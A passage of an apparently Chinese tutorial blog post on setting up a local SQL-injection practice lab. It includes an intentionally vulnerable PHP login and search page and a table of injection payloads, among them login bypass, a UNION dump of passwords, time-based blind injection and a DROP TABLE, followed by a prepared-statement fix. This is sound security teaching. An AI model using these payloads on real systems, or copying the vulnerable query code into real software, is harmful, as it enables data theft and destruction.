{"id":74890,"date":"2026-02-10T21:49:19","date_gmt":"2026-02-10T13:49:19","guid":{"rendered":"https:\/\/www.wsisp.com\/helps\/74890.html"},"modified":"2026-02-10T21:49:19","modified_gmt":"2026-02-10T13:49:19","slug":"%e4%bb%8e%e9%9b%b6%e6%9e%84%e5%bb%basql%e6%b3%a8%e5%85%a5%e9%9d%b6%e5%9c%ba%ef%bc%9a%e5%ae%9e%e6%88%98%e8%bf%9b%e9%98%b6%e4%b8%8e%e6%b7%b1%e5%ba%a6%e8%a7%a3%e6%9e%90","status":"publish","type":"post","link":"https:\/\/www.wsisp.com\/helps\/74890.html","title":{"rendered":"\u4ece\u96f6\u6784\u5efaSQL\u6ce8\u5165\u9776\u573a\uff1a\u5b9e\u6218\u8fdb\u9636\u4e0e\u6df1\u5ea6\u89e3\u6790"},"content":{"rendered":"

<\/h2>\n

\u5f15\u8a00<\/h3>\n

SQL\u6ce8\u5165(SQL Injection)\u4f5c\u4e3aOWASP Top 10\u957f\u671f\u5b58\u5728\u7684\u5b89\u5168\u5a01\u80c1,\u81f3\u4eca\u4ecd\u662fWeb\u5b89\u5168\u9886\u57df\u7684\u6838\u5fc3\u8bae\u9898\u3002\u6839\u636e2025\u5e74\u7f51\u7edc\u5b89\u5168\u62a5\u544a\u663e\u793a,\u8d85\u8fc740%\u7684Web\u5e94\u7528\u6f0f\u6d1e\u4e0eSQL\u6ce8\u5165\u76f8\u5173\u3002\u672c\u535a\u5ba2\u5c06\u901a\u8fc7\u5b9e\u6218\u6f14\u7ec3,\u5e26\u4f60\u4ece\u96f6\u5f00\u59cb\u642d\u5efa\u4e00\u4e2a\u8d34\u8fd1\u771f\u5b9e\u573a\u666f\u7684SQL\u6ce8\u5165\u9776\u573a,\u6df1\u5165\u7406\u89e3\u653b\u51fb\u539f\u7406\u3001\u638c\u63e1\u9632\u5fa1\u65b9\u6cd5\u3002<\/p>\n

\u672c\u6587\u5c06\u57fa\u4e8e\u6211\u8fd1\u671f\u642d\u5efaSQL\u6ce8\u5165\u9776\u573a\u7684\u5b8c\u6574\u8fc7\u7a0b,\u63d0\u4f9b\u8be6\u5c3d\u7684\u5b9e\u64cd\u6307\u5357\u3001\u5de5\u5177\u51c6\u5907\u548c\u6df1\u5165\u5206\u6790\u3002<\/p>\n

\u73af\u5883\u4e0e\u5de5\u5177\u51c6\u5907<\/h3>\n

1. \u5f00\u53d1\u73af\u5883\u5de5\u5177<\/h4>\n\n\u5de5\u5177\u7528\u9014\u4e0b\u8f7d\u94fe\u63a5\u5907\u6ce8<\/tr>\n\n\n\n\n\n
PHPStudy<\/td>\n\u96c6\u6210PHP+MySQL\u73af\u5883<\/td>\nphpstudy.net<\/td>\nWindows\u5e73\u53f0\u63a8\u8350,\u5305\u542bApache\/Nginx\u3001MySQL\u3001PHP<\/td>\n<\/tr>\n
TRAE CN<\/td>\n\u7f51\u7edc\u4ee3\u7406\u4e0e\u6293\u5305\u5de5\u5177<\/td>\ntrae.cn<\/td>\n\u56fd\u4ea7\u4f18\u79c0\u4ee3\u7406\u5de5\u5177,\u652f\u6301HTTP\/HTTPS\u6293\u5305<\/td>\n<\/tr>\n
Navicat Premium<\/td>\n\u6570\u636e\u5e93\u7ba1\u7406\u5de5\u5177<\/td>\nnavicat.com<\/td>\n\u56fe\u5f62\u5316\u6570\u636e\u5e93\u7ba1\u7406(\u53ef\u9009)<\/td>\n<\/tr>\n
VS Code\/Notepad++<\/td>\n\u4ee3\u7801\u7f16\u8f91\u5668<\/td>\ncode.visualstudio.com<\/td>\n\u4efb\u9009\u5176\u4e00<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

2. \u9776\u573a\u4ee3\u7801\u6587\u4ef6<\/h4>\n

\u6211\u4eec\u5c06\u4f7f\u7528"\u8fdb\u9636POST\u6ce8\u5165\u9776\u573a"\u7248\u672c,\u8be5\u7248\u672c\u6a21\u62df\u771f\u5b9e\u767b\u5f55\u573a\u666f,\u5305\u542b\u591a\u4e2a\u6ce8\u5165\u70b9,\u9002\u5408\u6df1\u5165\u5b66\u4e60\u3002<\/p>\n

\u5b8c\u6574\u5b9e\u64cd\u624b\u518c<\/h3>\n

\u7b2c1\u6b65:\u5b89\u88c5\u4e0e\u914d\u7f6ePHPStudy<\/h4>\n
  • \n

    \u4e0b\u8f7d\u5b89\u88c5:\u8bbf\u95eePHPStudy\u5b98\u7f51,\u4e0b\u8f7d\u6700\u65b0\u7248\u672c<\/p>\n<\/li>\n

  • \n

    \u5b89\u88c5\u8fc7\u7a0b:\u6309\u7167\u5411\u5bfc\u5b8c\u6210\u5b89\u88c5,\u5efa\u8bae\u5b89\u88c5\u8def\u5f84\u4e0d\u542b\u4e2d\u6587\u548c\u7a7a\u683c<\/p>\n<\/li>\n

  • \n

    \u542f\u52a8\u670d\u52a1:<\/p>\n

      \n
    • \n

      \u6253\u5f00PHPStudy\u63a7\u5236\u9762\u677f<\/p>\n<\/li>\n

    • \n

      \u9009\u62e9"Apache 2.4.39"\u548c"MySQL 5.7.26"(\u6216\u66f4\u9ad8\u7248\u672c)<\/p>\n<\/li>\n

    • \n

      \u70b9\u51fb"\u542f\u52a8"\u6309\u94ae,\u786e\u4fdd\u4e24\u4e2a\u670d\u52a1\u72b6\u6001\u663e\u793a\u4e3a\u7eff\u8272"\u8fd0\u884c\u4e2d"<\/p>\n<\/li>\n<\/ul>\n<\/li>\n

      \u7b2c2\u6b65:\u521b\u5efa\u6570\u636e\u5e93\u4e0e\u6d4b\u8bd5\u6570\u636e<\/h4>\n

      <\/h4>\n

      \u6253\u5f00MySQL\u5ba2\u6237\u7aef(\u5982PHPStudy\u547d\u4ee4\u884c\u6216Navicat),\u6267\u884c\u4ee5\u4e0bSQL\u811a\u672c\u5b8c\u6210\u6570\u636e\u5e93\u521d\u59cb\u5316:<\/p>\n

      — \u521b\u5efautf8mb4\u7f16\u7801\u7684school\u6570\u636e\u5e93
      \nCREATE DATABASE IF NOT EXISTS school DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci;<\/p>\n

      — \u5207\u6362\u81f3school\u6570\u636e\u5e93
      \nUSE school;<\/p>\n

      — \u521b\u5efa\u5e26\u7ea6\u675f\u6761\u4ef6\u7684students\u8868
      \nCREATE TABLE IF NOT EXISTS students (
      \n id INT AUTO_INCREMENT PRIMARY KEY,
      \n student_id VARCHAR(20) NOT NULL UNIQUE,
      \n name VARCHAR(50) NOT NULL,
      \n gender ENUM('\u7537', '\u5973') NOT NULL,
      \n age INT CHECK (age >= 0 AND age <= 150),
      \n password VARCHAR(255) NOT NULL DEFAULT '123456'
      \n);<\/p>\n

      — \u6279\u91cf\u63d2\u516530\u6761\u6d4b\u8bd5\u6570\u636e
      \nINSERT INTO students (student_id, name, gender, age) VALUES
      \n('2023001', '\u5f20\u4e09', '\u7537', 20),
      \n('2023002', '\u674e\u56db', '\u5973', 19),
      \n('2023003', '\u738b\u4e94', '\u7537', 21),
      \n('2023004', '\u8d75\u516d', '\u7537', 22),
      \n('2023005', '\u94b1\u4e03', '\u5973', 20),
      \n('2023006', '\u5b59\u516b', '\u7537', 19),
      \n('2023007', '\u5468\u4e5d', '\u5973', 21),
      \n('2023008', '\u5434\u5341', '\u7537', 20),
      \n('2023009', '\u90d1\u4e00', '\u5973', 22),
      \n('2023010', '\u738b\u82b3', '\u5973', 19),
      \n('2023011', '\u674e\u5f3a', '\u7537', 20),
      \n('2023012', '\u5f20\u4f1f', '\u7537', 21),
      \n('2023013', '\u5218\u6d0b', '\u7537', 19),
      \n('2023014', '\u9648\u9759', '\u5973', 22),
      \n('2023015', '\u6768\u5149', '\u7537', 20),
      \n('2023016', '\u9ec4\u84c9', '\u5973', 19),
      \n('2023017', '\u6797\u5cf0', '\u7537', 21),
      \n('2023018', '\u5f90\u5a77', '\u5973', 20),
      \n('2023019', '\u6731\u660e', '\u7537', 22),
      \n('2023020', '\u9a6c\u8d85', '\u7537', 19),
      \n('2023021', '\u8d75\u654f', '\u5973', 20),
      \n('2023022', '\u5468\u6770', '\u7537', 21),
      \n('2023023', '\u5434\u5029', '\u5973', 19),
      \n('2023024', '\u90d1\u51ef', '\u7537', 22),
      \n('2023025', '\u738b\u78ca', '\u7537', 20),
      \n('2023026', '\u5b59\u60a6', '\u5973', 21),
      \n('2023027', '\u674e\u5a1c', '\u5973', 19),
      \n('2023028', '\u5f20\u534e', '\u7537', 20),
      \n('2023029', '\u5218\u4f73', '\u5973', 22),
      \n('2023030', '\u9648\u6d69', '\u7537', 21);<\/p>\n

      — \u4f7f\u7528SHA-256\u52a0\u5bc6\u9ed8\u8ba4\u5bc6\u7801
      \nUPDATE students SET password = SHA2('123456', 256);<\/p>\n

      \u5173\u952e\u8bbe\u8ba1\u8bf4\u660e<\/h4>\n

      \u6570\u636e\u5e93\u91c7\u7528utf8mb4\u5b57\u7b26\u96c6,\u652f\u6301\u5b8c\u6574Unicode\u5b57\u7b26(\u5305\u62ecemoji)\u3002\u8868\u7ed3\u6784\u5305\u542b\u4ee5\u4e0b\u7ea6\u675f:<\/p>\n

        \n
      • student_id\u5b57\u6bb5\u8bbe\u7f6e\u552f\u4e00\u7d22\u5f15\u9632\u6b62\u91cd\u590d<\/li>\n
      • gender\u5b57\u6bb5\u4f7f\u7528ENUM\u7c7b\u578b\u9650\u5236\u8f93\u5165\u503c<\/li>\n
      • age\u5b57\u6bb5\u901a\u8fc7CHECK\u7ea6\u675f\u9650\u5b9a\u5408\u7406\u8303\u56f4<\/li>\n
      • \u5bc6\u7801\u5b57\u6bb5\u4f7f\u7528SHA2\u52a0\u5bc6\u7b97\u6cd5\u5b58\u50a8\u54c8\u5e0c\u503c<\/li>\n<\/ul>\n

        \u9a8c\u8bc1\u6570\u636e<\/h4>\n

        \u6267\u884c\u67e5\u8be2\u8bed\u53e5\u786e\u8ba4\u6570\u636e\u5b8c\u6574\u6027:<\/p>\n

        SELECT COUNT(*) FROM students; — \u5e94\u8fd4\u56de30
        \nSELECT * FROM students LIMIT 5; — \u68c0\u67e5\u524d5\u6761\u6570\u636e\u683c\u5f0f<\/p>\n

        \u7b2c3\u6b65:\u90e8\u7f72\u9776\u573a\u4ee3\u7801<\/h4>\n
      • \n

        \u627e\u5230\u7f51\u7ad9\u6839\u76ee\u5f55:<\/p>\n

          \n
        • \n

          PHPStudy\u9ed8\u8ba4\u7f51\u7ad9\u6839\u76ee\u5f55:D:\\\\phpstudy_pro\\\\WWW\\\\(\u6839\u636e\u5b9e\u9645\u5b89\u88c5\u8def\u5f84)<\/p>\n<\/li>\n

        • \n

          \u6216\u901a\u8fc7PHPStudy\u63a7\u5236\u9762\u677f \u2192 \u7f51\u7ad9 \u2192 \u7ba1\u7406 \u2192 \u6253\u5f00\u6839\u76ee\u5f55<\/p>\n<\/li>\n<\/ul>\n<\/li>\n

        • \n

          \u521b\u5efa\u9776\u573a\u6587\u4ef6:<\/p>\n

            \n
          • \n

            \u5728\u6839\u76ee\u5f55\u4e0b\u65b0\u5efa\u6587\u4ef6:sql_injection_lab.php<\/p>\n<\/li>\n

          • \n

            \u5c06\u4ee5\u4e0b"\u8fdb\u9636POST\u6ce8\u5165\u9776\u573a"\u4ee3\u7801\u590d\u5236\u5230\u6587\u4ef6\u4e2d<\/p>\n<\/li>\n<\/ul>\n<\/li>\n

            \u7b2c4\u6b65:\u9776\u573a\u4ee3\u7801\u8be6\u89e3<\/h4>\n

            \u4ee5\u4e0b\u662f\u6211\u4eec\u4f7f\u7528\u7684\u8fdb\u9636POST\u6ce8\u5165\u9776\u573a\u5b8c\u6574\u4ee3\u7801:<\/p>\n

            php<\/p>\n

            <?php
            \nheader('Content-Type: text\/html; charset=utf-8');<\/p>\n

            $db_host = '127.0.0.1';
            \n$db_user = 'root';
            \n$db_pass = 'root'; \/\/ \u6ce8\u610f:\u6839\u636e\u4f60\u7684PHPStudy MySQL\u5bc6\u7801\u4fee\u6539
            \n$db_name = 'school';
            \n$conn = mysqli_connect($db_host, $db_user, $db_pass, $db_name);
            \nif (!$conn) die("\u6570\u636e\u5e93\u8fde\u63a5\u5931\u8d25");<\/p>\n

            \/\/ \u4f7f\u7528POST\u63a5\u6536\u6570\u636e(\u66f4\u9690\u853d)
            \n$name = $_POST['name'] ?? '';
            \n$pwd = $_POST['password'] ?? '';<\/p>\n

            \/\/ \u6f0f\u6d1e1:\u767b\u5f55\u70b9\u6ce8\u5165
            \nif ($name != '' && $pwd != '') {
            \n \/\/ !!! \u5173\u952e\u6f0f\u6d1e:\u76f4\u63a5\u62fc\u63a5,\u5bc6\u7801\u90e8\u5206\u4e5f\u53ef\u6ce8\u5165 !!!
            \n $sql = "SELECT * FROM students WHERE name='$name' AND password='$pwd'";<\/p>\n

            echo "<div style='background:#fff3cd; padding:10px; margin:10px 0; border:1px solid #ffeaa7;'>";
            \n echo "<strong>\u8c03\u8bd5\u4fe1\u606f:<\/strong> SQL = " . htmlspecialchars($sql);
            \n echo "<\/div>";<\/p>\n

            $result = mysqli_query($conn, $sql);<\/p>\n

            if (mysqli_num_rows($result) > 0) {
            \n $user = mysqli_fetch_assoc($result);
            \n echo "<h2 style='color:green;'>🎉 \u767b\u5f55\u6210\u529f!<\/h2>";
            \n echo "<p>\u6b22\u8fce <strong>{$user['name']}<\/strong>(\u5b66\u53f7:{$user['student_id']})<\/p>";<\/p>\n

            \/\/ \u6f0f\u6d1e2:\u4e8c\u6b21\u67e5\u8be2\u6f0f\u6d1e(\u5728\u5df2\u767b\u5f55\u72b6\u6001\u4e0b)
            \n $search = $_POST['search'] ?? '';
            \n if ($search != '') {
            \n \/\/ !!! \u53e6\u4e00\u4e2a\u6ce8\u5165\u70b9:\u641c\u7d22\u529f\u80fd !!!
            \n $search_sql = "SELECT * FROM students WHERE name LIKE '%$search%' OR student_id LIKE '%$search%'";
            \n $search_result = mysqli_query($conn, $search_sql);
            \n echo "<h3>\u641c\u7d22\u7ed3\u679c:<\/h3>";
            \n while ($row = mysqli_fetch_assoc($search_result)) {
            \n echo "\u59d3\u540d:{$row['name']}, \u5b66\u53f7:{$row['student_id']}, \u5e74\u9f84:{$row['age']}<br>";
            \n }
            \n }
            \n } else {
            \n echo "<h3 style='color:red;'>\u767b\u5f55\u5931\u8d25<\/h3>";
            \n }
            \n}<\/p>\n

            mysqli_close($conn);
            \n?><\/p>\n

            <!DOCTYPE html>
            \n<html>
            \n<head>
            \n <title>SQL\u6ce8\u5165\u9776\u573a – \u8fdb\u9636POST\u7248<\/title>
            \n <style>
            \n body { font-family: 'Segoe UI', sans-serif; padding: 40px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; }
            \n .container { max-width: 1000px; margin: auto; background: white; padding: 30px; border-radius: 15px; box-shadow: 0 10px 30px rgba(0,0,0,0.2); }
            \n .form-box { background: #f8f9fa; padding: 25px; border-radius: 10px; margin-bottom: 30px; border-left: 5px solid #6c757d; }
            \n .injection-box { background: #fff5f5; border: 2px dashed #dc3545; padding: 20px; border-radius: 10px; margin-top: 30px; }
            \n h1, h2, h3 { color: #343a40; }
            \n .payload { background: #e9ecef; padding: 8px 12px; border-radius: 5px; font-family: monospace; margin: 5px 0; display: inline-block; }
            \n <\/style>
            \n<\/head>
            \n<body><\/p>\n

            <div class="container">
            \n <h1>🔐 \u8fdb\u9636SQL\u6ce8\u5165\u9776\u573a<\/h1>
            \n <p class="lead">\u6a21\u62df\u771f\u5b9e\u767b\u5f55\u4e0e\u641c\u7d22\u573a\u666f,\u5305\u542b\u591a\u4e2a\u6ce8\u5165\u70b9\u3002\u8bf7\u5c1d\u8bd5\u5229\u7528\u6f0f\u6d1e\u83b7\u53d6\u672a\u6388\u6743\u6570\u636e\u3002<\/p><\/p>\n

            <div class="form-box">
            \n <h2>\u767b\u5f55\u533a\u57df<\/h2>
            \n <form method="POST">
            \n <label>\u5b66\u751f\u59d3\u540d:<\/label><br>
            \n <input type="text" name="name" size="40" placeholder="\u4f8b\u5982:\u5f20\u4e09 \u6216 \u6ce8\u5165payload"><br><br><\/p>\n

            <label>\u5bc6\u7801:<\/label><br>
            \n <input type="password" name="password" size="40" placeholder="\u5c1d\u8bd5\u4f7f\u7528\u6ce8\u5165\u7ed5\u8fc7"><br><br><\/p>\n

            <button type="submit" style="background:#28a745; color:white; padding:10px 20px; border:none; border-radius:5px;">\u767b\u5f55<\/button>
            \n <\/form>
            \n <\/div><\/p>\n

            <?php if (isset($user)): ?>
            \n <div class="form-box">
            \n <h2>🔍 \u5b66\u751f\u4fe1\u606f\u641c\u7d22 (\u5df2\u767b\u5f55\u72b6\u6001)<\/h2>
            \n <form method="POST">
            \n <input type="hidden" name="name" value="<?php echo htmlspecialchars($name); ?>">
            \n <input type="hidden" name="password" value="<?php echo htmlspecialchars($pwd); ?>"><\/p>\n

            <label>\u641c\u7d22\u5b66\u751f(\u6309\u59d3\u540d\u6216\u5b66\u53f7):<\/label><br>
            \n <input type="text" name="search" size="50" placeholder="\u8f93\u5165\u59d3\u540d\u6216\u5b66\u53f7,\u4e5f\u53ef\u5c1d\u8bd5\u6ce8\u5165"><br><br>
            \n <button type="submit" style="background:#17a2b8; color:white; padding:8px 15px; border:none; border-radius:5px;">\u641c\u7d22<\/button>
            \n <\/form>
            \n <\/div>
            \n <?php endif; ?><\/p>\n

            <div class="injection-box">
            \n <h3>\u26a1 \u653b\u51fb\u6311\u6218\u4e0e\u63d0\u793a<\/h3>
            \n <p><strong>\u6311\u62181:<\/strong>\u4e0d\u4f7f\u7528\u6b63\u786e\u5bc6\u7801,\u4ee5"\u5f20\u4e09"\u7684\u8eab\u4efd\u767b\u5f55\u3002<\/p>
            \n <p><em>\u63d0\u793a:<\/em>\u5c1d\u8bd5\u5728\u5bc6\u7801\u6846\u8f93\u5165:<span class="payload">' OR '1'='1<\/span><\/p><\/p>\n

            <p><strong>\u6311\u62182:<\/strong>\u767b\u5f55\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u7528\u6237(\u4f8b\u5982"hacker")\u3002<\/p>
            \n <p><em>\u63d0\u793a:<\/em>\u5728\u59d3\u540d\u6846\u8f93\u5165:<span class="payload">hacker' OR '1'='1<\/span>,\u5bc6\u7801\u4efb\u610f\u3002<\/p><\/p>\n

            <p><strong>\u6311\u62183(\u9ad8\u7ea7):<\/strong>\u901a\u8fc7\u641c\u7d22\u529f\u80fd,dump\u51fa\u6240\u6709\u5b66\u751f\u7684\u5b66\u53f7\u548c\u59d3\u540d\u3002<\/p>
            \n <p><em>\u63d0\u793a:<\/em>\u767b\u5f55\u540e,\u5728\u641c\u7d22\u6846\u5c1d\u8bd5:<br>
            \n <span class="payload">' UNION SELECT 1, student_id, name, gender, age, password FROM students — <\/span><\/p><\/p>\n

            <p><strong>\u6269\u5c55\u601d\u8003:<\/strong>\u5982\u4f55\u901a\u8fc7\u62a5\u9519\u6ce8\u5165\u83b7\u53d6\u6570\u636e\u5e93\u7248\u672c\u4fe1\u606f?<\/p>
            \n <\/div><\/p>\n

            <div style="margin-top:40px; padding:15px; background:#e3f2fd; border-radius:8px;">
            \n <h4>📚 \u6f0f\u6d1e\u539f\u7406\u8bf4\u660e<\/h4>
            \n <p>1. <strong>\u5b57\u7b26\u4e32\u62fc\u63a5<\/strong>:\u7a0b\u5e8f\u5c06\u7528\u6237\u8f93\u5165\u76f4\u63a5\u62fc\u63a5\u5230SQL\u5b57\u7b26\u4e32\u4e2d,\u672a\u505a\u4efb\u4f55\u8fc7\u6ee4\u6216\u8f6c\u4e49\u3002<\/p>
            \n <p>2. <strong>\u7f3a\u5c11\u9884\u5904\u7406<\/strong>:\u672a\u4f7f\u7528<code>mysqli_prepare()<\/code>\u6216<code>PDO<\/code>\u7684\u53c2\u6570\u5316\u67e5\u8be2\u3002<\/p>
            \n <p>3. <strong>\u9519\u8bef\u4fe1\u606f\u6cc4\u9732<\/strong>:\u9875\u9762\u663e\u793a\u4e86\u539f\u59cbSQL\u8bed\u53e5,\u5e2e\u52a9\u653b\u51fb\u8005\u8c03\u6574payload\u3002<\/p>
            \n <p>4. <strong>\u6743\u9650\u8fc7\u5927<\/strong>:\u6570\u636e\u5e93\u7528\u6237\u6743\u9650\u8fc7\u9ad8,\u5141\u8bb8\u6267\u884cUNION\u3001SELECT\u7b49\u64cd\u4f5c\u3002<\/p>
            \n <\/div>
            \n<\/div><\/p>\n

            <\/body>
            \n<\/html> <\/p>\n

            \u5173\u952e\u70b9\u8bf4\u660e:<\/p>\n

          • \n

            \u6570\u636e\u5e93\u8fde\u63a5\u4fe1\u606f\u9700\u6839\u636e\u5b9e\u9645\u73af\u5883\u8c03\u6574(\u7279\u522b\u662f$db_pass)<\/p>\n<\/li>\n

          • \n

            \u4ee3\u7801\u4e2d\u6545\u610f\u4fdd\u7559\u4e86SQL\u8bed\u53e5\u56de\u663e,\u65b9\u4fbf\u5b66\u4e60\u89c2\u5bdf\u653b\u51fb\u8fc7\u7a0b<\/p>\n<\/li>\n

          • \n

            \u5305\u542b\u4e24\u4e2a\u6ce8\u5165\u70b9:\u767b\u5f55\u6ce8\u5165\u548c\u641c\u7d22\u6ce8\u5165<\/p>\n<\/li>\n

            \u7b2c5\u6b65:\u8bbf\u95ee\u4e0e\u6d4b\u8bd5\u9776\u573a<\/h4>\n
          • \n

            \u542f\u52a8\u9776\u573a:<\/p>\n

              \n
            • \n

              \u786e\u4fddPHPStudy\u7684Apache\u548cMySQL\u670d\u52a1\u6b63\u5728\u8fd0\u884c<\/p>\n<\/li>\n

            • \n

              \u6253\u5f00\u6d4f\u89c8\u5668,\u8bbf\u95ee:http:\/\/localhost\/sql_injection_lab.php<\/p>\n<\/li>\n<\/ul>\n<\/li>\n

            • \n

              \u6d4b\u8bd5\u6b63\u5e38\u529f\u80fd:<\/p>\n

                \n
              • \n

                \u4f7f\u7528\u5b66\u751f\u59d3\u540d(\u5982"\u5f20\u4e09")\u548c\u5bc6\u7801"123456"\u8fdb\u884c\u767b\u5f55\u6d4b\u8bd5<\/p>\n<\/li>\n

              • \n

                \u767b\u5f55\u6210\u529f\u540e\u5c1d\u8bd5\u641c\u7d22\u529f\u80fd<\/p>\n<\/li>\n<\/ul>\n<\/li>\n

                \u7b2c6\u6b65:\u914d\u7f6eTRAE CN\u8fdb\u884c\u6d41\u91cf\u5206\u6790<\/h4>\n
              • \n

                \u5b89\u88c5\u4e0e\u542f\u52a8TRAE CN:\u4e0b\u8f7d\u5b89\u88c5\u540e\u542f\u52a8<\/p>\n<\/li>\n

              • \n

                \u914d\u7f6e\u4ee3\u7406:<\/p>\n

                  \n
                • \n

                  \u8bbe\u7f6e\u6d4f\u89c8\u5668\u4ee3\u7406\u4e3a127.0.0.1:8866(TRAE CN\u9ed8\u8ba4\u7aef\u53e3)<\/p>\n<\/li>\n

                • \n

                  \u6216\u5728TRAE CN\u4e2d\u542f\u7528\u900f\u660e\u4ee3\u7406<\/p>\n<\/li>\n<\/ul>\n<\/li>\n

                • \n

                  \u6355\u83b7\u4e0e\u5206\u6790:<\/p>\n

                    \n
                  • \n

                    \u5728TRAE CN\u4e2d\u5f00\u59cb\u6355\u83b7\u6d41\u91cf<\/p>\n<\/li>\n

                  • \n

                    \u5728\u6d4f\u89c8\u5668\u4e2d\u8fdb\u884cSQL\u6ce8\u5165\u653b\u51fb\u5c1d\u8bd5<\/p>\n<\/li>\n

                  • \n

                    \u89c2\u5bdfHTTP\u8bf7\u6c42\/\u54cd\u5e94,\u5206\u6790\u6ce8\u5165payload\u7684\u4f20\u8f93\u8fc7\u7a0b<\/p>\n<\/li>\n<\/ul>\n<\/li>\n

                    SQL\u6ce8\u5165\u653b\u51fb\u6df1\u5ea6\u89e3\u6790<\/h3>\n

                    \u653b\u51fb\u539f\u7406\u5256\u6790<\/h4>\n

                    SQL\u6ce8\u5165\u7684\u6838\u5fc3\u95ee\u9898\u5728\u4e8e\u5c06\u7528\u6237\u8f93\u5165\u76f4\u63a5\u62fc\u63a5\u5230SQL\u8bed\u53e5\u4e2d\u6267\u884c\u3002\u8ba9\u6211\u4eec\u5206\u6790\u9776\u573a\u4e2d\u7684\u6f0f\u6d1e\u4ee3\u7801:<\/p>\n

                    php<\/p>\n

                    \/\/ \u5371\u9669\u4ee3\u7801:\u76f4\u63a5\u62fc\u63a5\u7528\u6237\u8f93\u5165
                    \n$sql = "SELECT * FROM students WHERE name='$name' AND password='$pwd'"; <\/p>\n

                    \u5f53\u653b\u51fb\u8005\u8f93\u5165:<\/p>\n

                      \n
                    • \n

                      \u7528\u6237\u540d:admin' —<\/p>\n<\/li>\n

                    • \n

                      \u5bc6\u7801:\u4efb\u610f\u503c<\/p>\n<\/li>\n<\/ul>\n

                      \u751f\u6210\u7684SQL\u8bed\u53e5\u53d8\u4e3a:<\/p>\n

                      sql<\/p>\n

                      SELECT * FROM students WHERE name='admin' — ' AND password='\u4efb\u610f\u503c' <\/p>\n

                      –\u5728MySQL\u4e2d\u8868\u793a\u5355\u884c\u6ce8\u91ca,\u540e\u7eed\u7684\u6761\u4ef6\u5224\u65ad\u88ab\u6ce8\u91ca\u6389,\u4ece\u800c\u7ed5\u8fc7\u4e86\u5bc6\u7801\u9a8c\u8bc1\u3002<\/p>\n

                      \u5e38\u89c1\u6ce8\u5165\u7c7b\u578b\u4e0ePayload<\/h4>\n\n\u6ce8\u5165\u7c7b\u578b\u793a\u4f8bPayload\u653b\u51fb\u6548\u679c<\/tr>\n\n\n\n\n\n\n
                      \u5e03\u5c14\u76f2\u6ce8<\/td>\n' AND 1=1 —<\/td>\n\u6d4b\u8bd5\u6ce8\u5165\u70b9\u662f\u5426\u5b58\u5728<\/td>\n<\/tr>\n
                      \u8054\u5408\u67e5\u8be2\u6ce8\u5165<\/td>\n' UNION SELECT 1,2,3,4,5 —<\/td>\n\u83b7\u53d6\u6570\u636e\u5e93\u6570\u636e<\/td>\n<\/tr>\n
                      \u62a5\u9519\u6ce8\u5165<\/td>\n' AND updatexml(1,concat(0x7e,(SELECT @@version)),1) —<\/td>\n\u901a\u8fc7\u9519\u8bef\u4fe1\u606f\u6cc4\u9732\u6570\u636e<\/td>\n<\/tr>\n
                      \u65f6\u95f4\u76f2\u6ce8<\/td>\n' AND IF(1=1,SLEEP(5),0) —<\/td>\n\u65e0\u56de\u663e\u65f6\u7684\u6ce8\u5165\u624b\u6bb5<\/td>\n<\/tr>\n
                      \u5806\u53e0\u67e5\u8be2<\/td>\n'; DROP TABLE students; —<\/td>\n\u6267\u884c\u591a\u6761SQL\u8bed\u53e5(\u5371\u9669)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

                      \u5b9e\u6218\u653b\u51fb\u6f14\u793a<\/h4>\n

                      \u6311\u62181:\u7ed5\u8fc7\u767b\u5f55\u9a8c\u8bc1<\/h5>\n

                      \u653b\u51fb\u6b65\u9aa4:<\/p>\n

                    • \n

                      \u5728\u5bc6\u7801\u6846\u8f93\u5165:' OR '1'='1<\/p>\n<\/li>\n

                    • \n

                      \u751f\u6210\u7684SQL:SELECT * FROM students WHERE name='\u5f20\u4e09' AND password='' OR '1'='1'<\/p>\n<\/li>\n

                    • \n

                      \u7531\u4e8e'1'='1'\u6c38\u8fdc\u4e3a\u771f,\u6210\u529f\u767b\u5f55<\/p>\n<\/li>\n

                      \u6311\u62182:\u767b\u5f55\u4e0d\u5b58\u5728\u7684\u7528\u6237<\/h5>\n

                      \u653b\u51fb\u6b65\u9aa4:<\/p>\n

                    • \n

                      \u5728\u59d3\u540d\u6846\u8f93\u5165:hacker' OR '1'='1<\/p>\n<\/li>\n

                    • \n

                      \u5bc6\u7801\u6846\u8f93\u5165\u4efb\u610f\u503c<\/p>\n<\/li>\n

                    • \n

                      \u751f\u6210\u7684SQL:SELECT * FROM students WHERE name='hacker' OR '1'='1' AND password='xxx'<\/p>\n<\/li>\n

                    • \n

                      \u7531\u4e8eOR '1'='1'\u6c38\u771f,\u7ed5\u8fc7\u7528\u6237\u9a8c\u8bc1<\/p>\n<\/li>\n

                      \u6311\u62183:\u901a\u8fc7\u641c\u7d22\u529f\u80fd\u83b7\u53d6\u6240\u6709\u6570\u636e<\/h5>\n

                      \u653b\u51fb\u6b65\u9aa4:<\/p>\n

                    • \n

                      \u5148\u4f7f\u7528\u4efb\u610f\u65b9\u5f0f\u767b\u5f55\u6210\u529f<\/p>\n<\/li>\n

                    • \n

                      \u5728\u641c\u7d22\u6846\u8f93\u5165:' UNION SELECT 1, student_id, name, gender, age, password FROM students —<\/p>\n<\/li>\n

                    • \n

                      \u901a\u8fc7UNION\u67e5\u8be2\u83b7\u53d6\u6240\u6709\u5b66\u751f\u7684\u654f\u611f\u4fe1\u606f<\/p>\n<\/li>\n

                      \u9632\u5fa1\u63aa\u65bd\u4e0e\u6700\u4f73\u5b9e\u8df5<\/h3>\n

                      \u53c2\u6570\u5316\u67e5\u8be2(\u9884\u5904\u7406\u8bed\u53e5)<\/h4>\n

                      \u4f7f\u7528\u9884\u5904\u7406\u8bed\u53e5\u80fd\u6709\u6548\u9694\u79bbSQL\u6307\u4ee4\u4e0e\u6570\u636e,\u9632\u6b62\u6076\u610f\u8f93\u5165\u88ab\u89e3\u91ca\u4e3a\u4ee3\u7801\u3002\u4ee5\u4e0b\u4e3aPHP\u5b9e\u73b0\u793a\u4f8b:<\/p>\n

                      <?php
                      \n$stmt = $conn->prepare("SELECT * FROM students WHERE name = ? AND password = ?");
                      \n$stmt->bind_param("ss", $name, $pwd); \/\/ "ss"\u8868\u793a\u4e24\u4e2a\u5b57\u7b26\u4e32\u53c2\u6570
                      \n$stmt->execute();
                      \n$result = $stmt->get_result();
                      \n?><\/p>\n

                      \u6700\u5c0f\u6743\u9650\u539f\u5219<\/h4>\n

